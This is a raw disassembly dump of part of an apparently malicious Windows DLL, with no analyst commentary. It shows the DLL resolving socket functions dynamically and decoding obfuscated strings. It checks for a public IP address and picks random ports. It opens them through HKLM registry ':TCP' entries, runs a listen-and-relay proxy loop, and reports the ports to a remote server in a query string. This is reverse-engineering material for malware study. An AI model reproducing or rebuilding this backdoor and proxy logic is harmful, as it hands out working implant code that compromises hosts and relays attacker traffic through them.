; ---------------------------------------------------------------------------
loc_10016766: ; CODE XREF: sub_10015BF1+AA0�j
mov [ebp+var_C4FC], 2
mov cx, [ebp+var_C378]
mov [ebp+var_C4FA], cx
movsx edx, [ebp+var_C38C]
cmp edx, 3
jnz short loc_100167BB
mov eax, [ebp+name]
push eax ; name
call ds:gethostbyname ; gethostbyname
mov [ebp+var_C504], eax
push 4 ; Size
mov ecx, [ebp+var_C504]
mov edx, [ecx+0Ch]
mov eax, [edx]
push eax ; Src
lea ecx, [ebp+var_C4F8]
push ecx ; Dst
call memcpy ; memcpy
add esp, 0Ch
jmp short loc_100167C9
; ---------------------------------------------------------------------------
loc_100167BB: ; CODE XREF: sub_10015BF1+B96�j
mov edx, [ebp+name]
mov eax, [edx]
mov [ebp+var_C4F8], eax
loc_100167C9: ; CODE XREF: sub_10015BF1+BC8�j
push 10h
lea ecx, [ebp+var_C4FC]
push ecx
mov edx, [ebp+var_C3A0]
push edx
call dword_10073F84 ; bind
mov [ebp+var_C518], eax
mov eax, [ebp+var_C518]
mov [ebp+len], eax
cmp [ebp+len], 0
jz short loc_10016818
mov ecx, [ebp+len]
push ecx ; int
mov edx, [ebp+s]
push edx ; s
call sub_10014769
add esp, 8
or eax, 0FFFFFFFFh
jmp loc_10016AA0
; ---------------------------------------------------------------------------
loc_10016818: ; CODE XREF: sub_10015BF1+C07�j
push 5
mov eax, [ebp+var_C3A0]
push eax
call dword_10073F88
mov [ebp+var_C51C], eax
mov ecx, [ebp+var_C51C]
mov [ebp+len], ecx
cmp [ebp+len], 0
jz short loc_10016860
mov edx, [ebp+len]
push edx ; int
mov eax, [ebp+s]
push eax ; s
call sub_10014769
add esp, 8
or eax, 0FFFFFFFFh
jmp loc_10016AA0
; ---------------------------------------------------------------------------
loc_10016860: ; CODE XREF: sub_10015BF1+C4F�j
mov ecx, [ebp+var_C3A0]
push ecx ; s
mov edx, [ebp+s]
push edx ; int
call sub_10014871
add esp, 8
mov [ebp+var_C500], 10h
lea eax, [ebp+var_C500]
push eax
lea ecx, [ebp+var_C4FC]
push ecx
mov edx, [ebp+var_C3A0]
push edx
call dword_10073F80 ; accept
mov [ebp+var_C520], eax
mov eax, [ebp+var_C520]
mov [ebp+var_C3A0], eax
cmp [ebp+var_C3A0], 0FFFFFFFFh
jnz short loc_100168D4
mov ecx, [ebp+len]
push ecx ; int
mov edx, [ebp+s]
push edx ; s
call sub_10014769
add esp, 8
or eax, 0FFFFFFFFh
jmp loc_10016AA0
; ---------------------------------------------------------------------------
loc_100168D4: ; CODE XREF: sub_10015BF1+CC3�j
mov eax, [ebp+var_C3A0]
push eax ; s
mov ecx, [ebp+s]
push ecx ; int
call sub_10014871
add esp, 8
loc_100168EA: ; CODE XREF: sub_10015BF1+AA6�j
; sub_10015BF1+B70�j
push 4 ; Size
call ds:malloc ; malloc
add esp, 4
mov [ebp+lpParameter], eax
mov edx, [ebp+lpParameter]
mov eax, [ebp+var_C3A0]
mov [edx+4], eax
mov ecx, [ebp+lpParameter]
mov edx, [ebp+s]
mov [ecx], edx
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
push 0 ; dwCreationFlags
mov ecx, [ebp+lpParameter]
push ecx ; lpParameter
push offset sub_10014916 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov [ebp+var_14], eax
loc_1001692E: ; CODE XREF: sub_10015BF1:loc_10016A78�j
mov edx, 1
test edx, edx
jz loc_10016A7D
loc_1001693B: ; CODE XREF: sub_10015BF1+DC9�j
mov [ebp+var_C508], 0
jmp short loc_10016956
; ---------------------------------------------------------------------------
loc_10016947: ; CODE XREF: sub_10015BF1:loc_1001697B�j
mov eax, [ebp+var_C508]
add eax, 1
mov [ebp+var_C508], eax
loc_10016956: ; CODE XREF: sub_10015BF1+D54�j
mov ecx, [ebp+var_C508]
cmp ecx, [ebp+readfds.fd_count]
jnb short loc_1001697D
mov edx, [ebp+var_C508]
mov eax, [ebp+edx*4+readfds.fd_array]
cmp eax, [ebp+s]
jnz short loc_1001697B
jmp short loc_1001697D
; ---------------------------------------------------------------------------
loc_1001697B: ; CODE XREF: sub_10015BF1+D86�j
jmp short loc_10016947
; ---------------------------------------------------------------------------
loc_1001697D: ; CODE XREF: sub_10015BF1+D71�j
; sub_10015BF1+D88�j
mov ecx, [ebp+var_C508]
cmp ecx, [ebp+readfds.fd_count]
jnz short loc_100169B6
cmp [ebp+readfds.fd_count], 40h
jnb short loc_100169B6
mov edx, [ebp+var_C508]
mov eax, [ebp+s]
mov [ebp+edx*4+readfds.fd_array], eax
mov ecx, [ebp+readfds.fd_count]
add ecx, 1
mov [ebp+readfds.fd_count], ecx
loc_100169B6: ; CODE XREF: sub_10015BF1+D98�j
; sub_10015BF1+DA1�j
xor edx, edx
test edx, edx
jnz loc_1001693B
lea eax, [ebp+timeout]
push eax ; timeout
push 0 ; exceptfds
push 0 ; writefds
lea ecx, [ebp+readfds]
push ecx ; readfds
push 0 ; nfds
call ds:select ; select
push 0 ; flags
push 0C350h ; len
lea edx, [ebp+var_C368]
push edx ; buf
mov eax, [ebp+s]
push eax ; s
call ds:recv ; recv
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10016A1B
mov ecx, [ebp+s]
push ecx ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp loc_10016AA0
; ---------------------------------------------------------------------------
loc_10016A1B: ; CODE XREF: sub_10015BF1+E11�j
cmp [ebp+len], 0
jnz short loc_10016A38
mov edx, [ebp+s]
push edx ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp short loc_10016AA0
; ---------------------------------------------------------------------------
loc_10016A38: ; CODE XREF: sub_10015BF1+E31�j
push 0 ; flags
mov eax, [ebp+len]
push eax ; len
lea ecx, [ebp+var_C368]
push ecx ; buf
mov edx, [ebp+var_C3A0]
push edx ; s
call ds:send ; send
mov [ebp+len], eax
cmp [ebp+len], 0FFFFFFFFh
jnz short loc_10016A78
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
mov eax, 2
jmp short loc_10016AA0
; ---------------------------------------------------------------------------
loc_10016A78: ; CODE XREF: sub_10015BF1+E71�j
jmp loc_1001692E
; ---------------------------------------------------------------------------
loc_10016A7D: ; CODE XREF: sub_10015BF1+D44�j
jmp short loc_10016A97
; ---------------------------------------------------------------------------
loc_10016A7F: ; DATA XREF: .rdata:stru_10020318�o
mov [ebp+var_C50C], 0
mov eax, offset loc_10016A8F
retn
; ---------------------------------------------------------------------------
loc_10016A8F: ; DATA XREF: sub_10015BF1+E98�o
mov eax, [ebp+var_C50C]
jmp short loc_10016AA0
; ---------------------------------------------------------------------------
loc_10016A97: ; CODE XREF: sub_10015BF1:loc_10016A7D�j
mov [ebp+var_4], 0FFFFFFFFh
xor eax, eax
loc_10016AA0: ; CODE XREF: sub_10015BF1+12F�j
; sub_10015BF1+213�j ...
mov ecx, [ebp+var_C]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_10015BF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_10016AB3(u_short hostshort)
sub_10016AB3 proc near ; CODE XREF: sub_10016C4C+6F3�p
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
lpParameter = dword ptr -18h
var_14 = dword ptr -14h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
hostshort = word ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push 6 ; protocol
push 1 ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+var_14], eax
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_10016AD8
mov eax, 0FFFFFFFEh
jmp loc_10016B6B
; ---------------------------------------------------------------------------
loc_10016AD8: ; CODE XREF: sub_10016AB3+19�j
mov [ebp+var_10], 2
mov ax, [ebp+hostshort]
push eax ; hostshort
call ds:htons ; htons
mov [ebp+var_E], ax
mov [ebp+var_C], 0
push 10h
lea ecx, [ebp+var_10]
push ecx
mov edx, [ebp+var_14]
push edx
call dword_10073F84 ; bind
test eax, eax
jz short loc_10016B0F
mov eax, 0FFFFFFFEh
jmp short loc_10016B6B
; ---------------------------------------------------------------------------
loc_10016B0F: ; CODE XREF: sub_10016AB3+53�j
push 32h
mov eax, [ebp+var_14]
push eax
call dword_10073F88
loc_10016B1B: ; CODE XREF: sub_10016AB3+B1�j
mov ecx, 1
test ecx, ecx
jz short loc_10016B66
mov [ebp+var_2C], 10h
lea edx, [ebp+var_2C]
push edx
lea eax, [ebp+var_28]
push eax
mov ecx, [ebp+var_14]
push ecx
call dword_10073F80 ; accept
mov [ebp+lpParameter], eax
cmp [ebp+lpParameter], 0FFFFFFFFh
jnz short loc_10016B4D
mov eax, 0FFFFFFFDh
jmp short loc_10016B6B
; ---------------------------------------------------------------------------
loc_10016B4D: ; CODE XREF: sub_10016AB3+91�j
push 0 ; lpThreadId
push 0 ; dwCreationFlags
mov edx, [ebp+lpParameter]
push edx ; lpParameter
push offset sub_10015BF1 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
jmp short loc_10016B1B
; ---------------------------------------------------------------------------
loc_10016B66: ; CODE XREF: sub_10016AB3+6F�j
mov eax, 1
loc_10016B6B: ; CODE XREF: sub_10016AB3+20�j
; sub_10016AB3+5A�j ...
mov esp, ebp
pop ebp
retn 4
sub_10016AB3 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_10016B74: ; CODE XREF: .text:10016BB5�j
mov eax, 1
test eax, eax
jz short loc_10016BB7
cmp dword_10073F78, 1
jnb short loc_10016BAA
mov ecx, dword_10073F78
add ecx, 1
mov dword_10073F78, ecx
push 0
push 0
push 0
push offset sub_10014B0F
push 0
push 0
call ds:CreateThread ; CreateThread
loc_10016BAA: ; CODE XREF: .text:10016B84�j
push 7D0h
call ds:Sleep ; Sleep
jmp short loc_10016B74
; ---------------------------------------------------------------------------
loc_10016BB7: ; CODE XREF: .text:10016B7B�j
mov eax, 1
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10016BBE(u_short hostshort)
sub_10016BBE proc near ; CODE XREF: sub_10016C4C+673�p
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
hostshort = word ptr 8
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_14], 2
mov ax, [ebp+hostshort]
push eax ; hostshort
call ds:htons ; htons
mov [ebp+var_12], ax
mov [ebp+var_10], 0
push 0 ; protocol
push 1 ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+var_4], eax
cmp [ebp+var_4], 0FFFFFFFFh
jnz short loc_10016BF9
xor eax, eax
jmp short loc_10016C48
; ---------------------------------------------------------------------------
loc_10016BF9: ; CODE XREF: sub_10016BBE+35�j
push 10h
lea ecx, [ebp+var_14]
push ecx
mov edx, [ebp+var_4]
push edx
call dword_10073F84 ; bind
test eax, eax
jz short loc_10016C11
xor eax, eax
jmp short loc_10016C48
; ---------------------------------------------------------------------------
loc_10016C11: ; CODE XREF: sub_10016BBE+4D�j
push 32h
mov eax, [ebp+var_4]
push eax
call dword_10073F88
test eax, eax
jz short loc_10016C25
xor eax, eax
jmp short loc_10016C48
; ---------------------------------------------------------------------------
loc_10016C25: ; CODE XREF: sub_10016BBE+61�j
mov ecx, [ebp+var_4]
mov dword_10073F34, ecx
push 0 ; lpThreadId
push 0 ; dwCreationFlags
push 0 ; lpParameter
push offset sub_10013E02 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call ds:CreateThread ; CreateThread
mov eax, 1
loc_10016C48: ; CODE XREF: sub_10016BBE+39�j
; sub_10016BBE+51�j ...
mov esp, ebp
pop ebp
retn
sub_10016BBE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall sub_10016C4C(LPVOID)
sub_10016C4C proc near ; DATA XREF: DllMain(x,x,x)+1DA�o
String2 = byte ptr -0B68h
Source = byte ptr -0B28h
var_AE8 = dword ptr -0AE8h
Str1 = dword ptr -0AE4h
s = dword ptr -0AE0h
var_ADC = dword ptr -0ADCh
String1 = byte ptr -0AD8h
var_AD7 = byte ptr -0AD7h
FileName = byte ptr -0AB8h
var_AB7 = byte ptr -0AB7h
cbBytesReturned = dword ptr -9B8h
WSAData = WSAData ptr -9B4h
vOutBuffer = dword ptr -824h
var_820 = dword ptr -820h
hModule = dword ptr -424h
Buffer = dword ptr -420h
hObject = dword ptr -41Ch
var_418 = dword ptr -418h
var_414 = dword ptr -414h
lpBuffer = dword ptr -410h
NumberOfBytesWritten= dword ptr -40Ch
hostshort = word ptr -408h
Dest = byte ptr -404h
var_403 = byte ptr -403h
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0B68h
push edi
lea eax, [ebp+WSAData]
push eax ; lpWSAData
push 202h ; wVersionRequested
call ds:WSAStartup ; WSAStartup
mov [ebp+String1], 0
mov ecx, 7
xor eax, eax
lea edi, [ebp+var_AD7]
rep stosd
stosw
stosb
mov [ebp+FileName], 0
mov ecx, 3Fh
xor eax, eax
lea edi, [ebp+var_AB7]
rep stosd
stosw
mov [ebp+lpBuffer], 0
mov [ebp+Dest], 0
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_403]
rep stosd
stosw
stosb
mov dword ptr [ebp+hostshort], 0FFFFFFFFh
mov [ebp+Buffer], 0FFFFFFFFh
mov [ebp+Str1], 0
push offset aWs2_32 ; "ws2_32"
call ds:LoadLibraryA ; LoadLibraryA
mov [ebp+hModule], eax
push offset aAccept ; "accept"
mov ecx, [ebp+hModule]
push ecx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_10073F80, eax
push offset aBind ; "bind"
mov edx, [ebp+hModule]
push edx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_10073F84, eax
push offset dword_10073E34 ; Dest
mov eax, off_10022030
push eax ; int
mov ecx, off_100220A0
push ecx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpProcName
mov edx, [ebp+hModule]
push edx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_10073F88, eax
push offset asc_10023E84 ; "--"
lea eax, [ebp+String1]
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
push offset dword_10073E34 ; Dest
mov ecx, off_10022030
push ecx ; int
mov edx, off_1002208C
push edx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpLibFileName
call ds:LoadLibraryA ; LoadLibraryA
mov dword_10073E1C, eax
push offset dword_10073E34 ; Dest
mov eax, off_10022030
push eax ; int
mov ecx, off_10022090
push ecx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpProcName
mov edx, dword_10073E1C
push edx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_10073F7C, eax
mov eax, dword_10073E1C
push eax ; hLibModule
call ds:FreeLibrary ; FreeLibrary
cmp dword_10073F7C, 0
jz short loc_10016DF8
push 0
lea ecx, [ebp+var_414]
push ecx
call dword_10073F7C
mov [ebp+var_4], eax
loc_10016DD3: ; CODE XREF: sub_10016C4C+1AA�j
cmp [ebp+var_4], 0
jnz short loc_10016DF8
push 0EA60h ; dwMilliseconds
call ds:Sleep ; Sleep
push 0
lea edx, [ebp+var_414]
push edx
call dword_10073F7C
mov [ebp+var_4], eax
jmp short loc_10016DD3
; ---------------------------------------------------------------------------
loc_10016DF8: ; CODE XREF: sub_10016C4C+173�j
; sub_10016C4C+18B�j
push offset dword_10073E34 ; Dest
mov eax, off_10022030
push eax ; int
mov ecx, off_100220CC
push ecx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpString2
push offset name ; lpString1
call ds:lstrcpyA ; lstrcpyA
push offset name ; lpString2
call sub_10005BE3
add esp, 4
test eax, eax
jnz short loc_10016E55
push offset dword_10073E34 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_100220D0
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpString2
push offset name ; lpString1
call ds:lstrcpyA ; lstrcpyA
loc_10016E55: ; CODE XREF: sub_10016C4C+1E1�j
mov ecx, [ebp+var_414]
and ecx, 2
test ecx, ecx
jz short loc_10016E8A
push offset dword_10073E34 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_1002209C
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpString2
lea ecx, [ebp+String1]
push ecx ; lpString1
call ds:lstrcpyA ; lstrcpyA
loc_10016E8A: ; CODE XREF: sub_10016C4C+214�j
mov edx, [ebp+var_414]
and edx, 1
test edx, edx
jz short loc_10016EBF
push offset dword_10073E34 ; Dest
mov eax, off_10022030
push eax ; int
mov ecx, off_10022098
push ecx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpString2
lea edx, [ebp+String1]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
loc_10016EBF: ; CODE XREF: sub_10016C4C+249�j
mov [ebp+var_ADC], 0
push 0 ; protocol
push 1 ; type
push 2 ; af
call ds:socket ; socket
mov [ebp+s], eax
cmp [ebp+s], 0FFFFFFFFh
jz loc_10016FEC
push 0 ; lpCompletionRoutine
push 0 ; lpOverlapped
lea eax, [ebp+cbBytesReturned]
push eax ; lpcbBytesReturned
push 400h ; cbOutBuffer
lea ecx, [ebp+vOutBuffer]
push ecx ; lpvOutBuffer
push 0 ; cbInBuffer
push 0 ; lpvInBuffer
push 48000016h ; dwIoControlCode
mov edx, [ebp+s]
push edx ; s
call ds:WSAIoctl ; WSAIoctl
cmp eax, 0FFFFFFFFh
jz loc_10016FDF
mov eax, [ebp+vOutBuffer]
mov [ebp+var_418], eax
cmp [ebp+var_418], 0
jbe loc_10016FDF
mov [ebp+var_AE8], 0
jmp short loc_10016F52
; ---------------------------------------------------------------------------
loc_10016F43: ; CODE XREF: sub_10016C4C:loc_10016FDA�j
mov ecx, [ebp+var_AE8]
add ecx, 1
mov [ebp+var_AE8], ecx
loc_10016F52: ; CODE XREF: sub_10016C4C+2F5�j
mov edx, [ebp+var_AE8]
cmp edx, [ebp+var_418]
jnb short loc_10016FDF
mov eax, [ebp+var_AE8]
mov ecx, [ebp+eax*8+var_820]
mov edx, [ecx+4]
push edx ; in
call ds:inet_ntoa ; inet_ntoa
mov [ebp+Str1], eax
push 3 ; MaxCount
push offset a10_ ; "10."
mov eax, [ebp+Str1]
push eax ; Str1
call ds:strncmp ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_10016FDA
push 8 ; MaxCount
push offset a192_168_ ; "192.168."
mov ecx, [ebp+Str1]
push ecx ; Str1
call ds:strncmp ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_10016FDA
push 7 ; MaxCount
push offset a172_16_ ; "172.16."
mov edx, [ebp+Str1]
push edx ; Str1
call ds:strncmp ; strncmp
add esp, 0Ch
test eax, eax
jz short loc_10016FDA
mov [ebp+var_ADC], 1
jmp short loc_10016FDF
; ---------------------------------------------------------------------------
loc_10016FDA: ; CODE XREF: sub_10016C4C+34A�j
; sub_10016C4C+365�j ...
jmp loc_10016F43
; ---------------------------------------------------------------------------
loc_10016FDF: ; CODE XREF: sub_10016C4C+2CC�j
; sub_10016C4C+2E5�j ...
mov eax, [ebp+s]
push eax ; s
call ds:closesocket ; closesocket
loc_10016FEC: ; CODE XREF: sub_10016C4C+296�j
call sub_1000B536
cmp [ebp+var_ADC], 0
jz loc_10017346
push 0 ; Time
call ds:time ; time
add esp, 4
push eax ; Seed
call ds:srand ; srand
add esp, 4
push 0FFh ; uSize
lea ecx, [ebp+FileName]
push ecx ; lpBuffer
call ds:GetSystemDirectoryA ; GetSystemDirectoryA
push offset dword_10073E34 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_1002206C
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpString2
lea ecx, [ebp+FileName]
push ecx ; lpString1
call ds:lstrcatA ; lstrcatA
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 3 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 80000000h ; dwDesiredAccess
lea edx, [ebp+FileName]
push edx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jz short loc_100170C3
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesRead
push 4 ; nNumberOfBytesToRead
lea ecx, [ebp+Buffer]
push ecx ; lpBuffer
mov edx, [ebp+hObject]
push edx ; hFile
call ds:ReadFile ; ReadFile
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesRead
push 4 ; nNumberOfBytesToRead
lea ecx, [ebp+hostshort]
push ecx ; lpBuffer
mov edx, [ebp+hObject]
push edx ; hFile
call ds:ReadFile ; ReadFile
mov eax, [ebp+hObject]
push eax ; hObject
call ds:CloseHandle ; CloseHandle
loc_100170C3: ; CODE XREF: sub_10016C4C+42A�j
cmp [ebp+Buffer], 0
jle short loc_100170D9
cmp dword ptr [ebp+hostshort], 0
jg loc_100172B8
loc_100170D9: ; CODE XREF: sub_10016C4C+47E�j
push 0 ; hTemplateFile
push 0 ; dwFlagsAndAttributes
push 4 ; dwCreationDisposition
push 0 ; lpSecurityAttributes
push 1 ; dwShareMode
push 40000000h ; dwDesiredAccess
lea ecx, [ebp+FileName]
push ecx ; lpFileName
call ds:CreateFileA ; CreateFileA
mov [ebp+hObject], eax
cmp [ebp+hObject], 0FFFFFFFFh
jz loc_100172B8
lea edx, [ebp+String2]
push edx ; DstBuf
push 0FFDCh ; int
push 2710h ; int
call sub_100139D0
add esp, 0Ch
lea eax, [ebp+String2]
push eax ; Str
call ds:atoi ; atoi
add esp, 4
mov [ebp+Buffer], eax
push 0 ; lpOverlapped
lea ecx, [ebp+NumberOfBytesWritten]
push ecx ; lpNumberOfBytesWritten
push 4 ; nNumberOfBytesToWrite
lea edx, [ebp+Buffer]
push edx ; lpBuffer
mov eax, [ebp+hObject]
push eax ; hFile
call ds:WriteFile ; WriteFile
push offset aTcp ; ":TCP"
lea ecx, [ebp+String2]
push ecx ; lpString1
call ds:lstrcatA ; lstrcatA
lea edx, [ebp+String2]
push edx ; lpString2
lea eax, [ebp+Source]
push eax ; lpString1
call ds:lstrcpyA ; lstrcpyA
push offset dword_10073E34 ; Dest
mov ecx, off_10022030
push ecx ; int
mov edx, off_100220B4
push edx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpString2
lea eax, [ebp+Source]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
push 3 ; int
lea ecx, [ebp+Source]
push ecx ; Source
lea edx, [ebp+String2]
push edx ; lpValueName
mov eax, off_100220B0
push eax ; Str
push 80000002h ; hKey
call sub_10002C3D
add esp, 14h
lea ecx, [ebp+String2]
push ecx ; DstBuf
push 0FFDCh ; int
push 2710h ; int
call sub_100139D0
add esp, 0Ch
lea edx, [ebp+String2]
push edx ; Str
call ds:atoi ; atoi
add esp, 4
mov dword ptr [ebp+hostshort], eax
push 0 ; lpOverlapped
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
push 4 ; nNumberOfBytesToWrite
lea ecx, [ebp+hostshort]
push ecx ; lpBuffer
mov edx, [ebp+hObject]
push edx ; hFile
call ds:WriteFile ; WriteFile
push offset aTcp_0 ; ":TCP"
lea eax, [ebp+String2]
push eax ; lpString1
call ds:lstrcatA ; lstrcatA
lea ecx, [ebp+String2]
push ecx ; lpString2
lea edx, [ebp+Source]
push edx ; lpString1
call ds:lstrcpyA ; lstrcpyA
push offset dword_10073E34 ; Dest
mov eax, off_10022030
push eax ; int
mov ecx, off_100220B4
push ecx ; Str
call sub_100010BB
add esp, 0Ch
push eax ; lpString2
lea edx, [ebp+Source]
push edx ; lpString1
call ds:lstrcatA ; lstrcatA
push 3 ; int
lea eax, [ebp+Source]
push eax ; Source
lea ecx, [ebp+String2]
push ecx ; lpValueName
mov edx, off_100220B0
push edx ; Str
push 80000002h ; hKey
call sub_10002C3D
add esp, 14h
push 1 ; int
mov eax, off_100220AC
push eax ; Source
mov ecx, off_100220A8
push ecx ; lpValueName
mov edx, off_100220A4
push edx ; Str
push 80000002h ; hKey
call sub_10002C3D
add esp, 14h
mov eax, [ebp+hObject]
push eax ; hObject
call ds:CloseHandle ; CloseHandle
loc_100172B8: ; CODE XREF: sub_10016C4C+487�j
; sub_10016C4C+4B6�j
mov ecx, [ebp+Buffer]
push ecx ; hostshort
call sub_10016BBE
add esp, 4
mov edx, dword ptr [ebp+hostshort]
push edx
mov eax, [ebp+Buffer]
push eax
lea ecx, [ebp+String1]
push ecx
push offset byte_10065ED8
push offset dword_10073E34 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_10022094
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax
push offset name
push offset aSSSCntSHpDSpD ; "%s%s%s&cnt=%s&hp=%d&sp=%d"
lea ecx, [ebp+Dest]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 20h
push 5 ; int
push 0 ; Source
push 0 ; lpFileName
mov edx, [ebp+lpBuffer]
push edx ; lpBuffer
lea eax, [ebp+Dest]
push eax ; lpString2
call sub_10005E66
add esp, 14h
mov [ebp+lpBuffer], eax
mov ecx, dword ptr [ebp+hostshort]
push ecx ; hostshort
call sub_10016AB3
jmp short loc_100173A7
; ---------------------------------------------------------------------------
loc_10017346: ; CODE XREF: sub_10016C4C+3AC�j
push offset aCb ; "CB"
push offset byte_10065ED8
push offset dword_10073E34 ; Dest
mov edx, off_10022030
push edx ; int
mov eax, off_10022094
push eax ; Str
call sub_100010BB
add esp, 0Ch
push eax
push offset name
push offset aSSSCntS ; "%s%s%s&cnt=%s"
lea ecx, [ebp+Dest]
push ecx ; Dest
call ds:sprintf ; sprintf
add esp, 18h
push 5 ; int
push 0 ; Source
push 0 ; lpFileName
mov edx, [ebp+lpBuffer]
push edx ; lpBuffer
lea eax, [ebp+Dest]
push eax ; lpString2
call sub_10005E66
add esp, 14h
mov [ebp+lpBuffer], eax
loc_100173A7: ; CODE XREF: sub_10016C4C+6F8�j
mov eax, 1
pop edi
mov esp, ebp
pop ebp
retn 4
sub_10016C4C endp
; [0000002C BYTES: COLLAPSED FUNCTION __onexit. PRESS KEYPAD "+" TO EXPAND]
; [00000012 BYTES: COLLAPSED FUNCTION _atexit. PRESS KEYPAD "+" TO EXPAND]
align 2
; [00000006 BYTES: COLLAPSED FUNCTION strlen. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION memset. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION strcat. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION strcmp. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION strcpy. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION __CxxFrameHandler. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [00000006 BYTES: COLLAPSED FUNCTION operator delete(void *). PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION operator new(uint). PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION memcpy. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION wcslen. PRESS KEYPAD "+" TO EXPAND]
align 10h
; [0000002F BYTES: COLLAPSED FUNCTION __alloca_probe. PRESS KEYPAD "+" TO EXPAND]
align 10h
loc_10017470: ; DATA XREF: sub_1000EA00+A�o
; sub_1000FCEB+A�o ...
jmp ds:_except_handler3
; [000000AB BYTES: COLLAPSED FUNCTION _CRT_INIT(x,x,x). PRESS KEYPAD "+" TO EXPAND]
; [0000009D BYTES: COLLAPSED FUNCTION DllEntryPoint. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION __dllonexit. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION _initterm. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Thread32Next. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION Thread32First. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION CreateToolhelp32Snapshot. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION GetAncestor. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION DecryptMessage. PRESS KEYPAD "+" TO EXPAND]
; [00000006 BYTES: COLLAPSED FUNCTION EncryptMessage. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_100175EE(LPCVOID lpAddress, int)
sub_100175EE proc near ; CODE XREF: sub_10017B39+75�p
; sub_10017B39+84�p ...
lpAddress = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4] ; int
push [esp+4+lpAddress] ; lpAddress
call sub_10017600
pop ecx
pop ecx
retn 8
sub_100175EE endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_10017600(LPCVOID lpAddress, int)
sub_10017600 proc near ; CODE XREF: sub_100175EE+8�p
lpAddress = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+lpAddress]
test esi, esi
push edi
jnz short loc_1001760E
xor eax, eax
jmp short loc_10017653
; ---------------------------------------------------------------------------
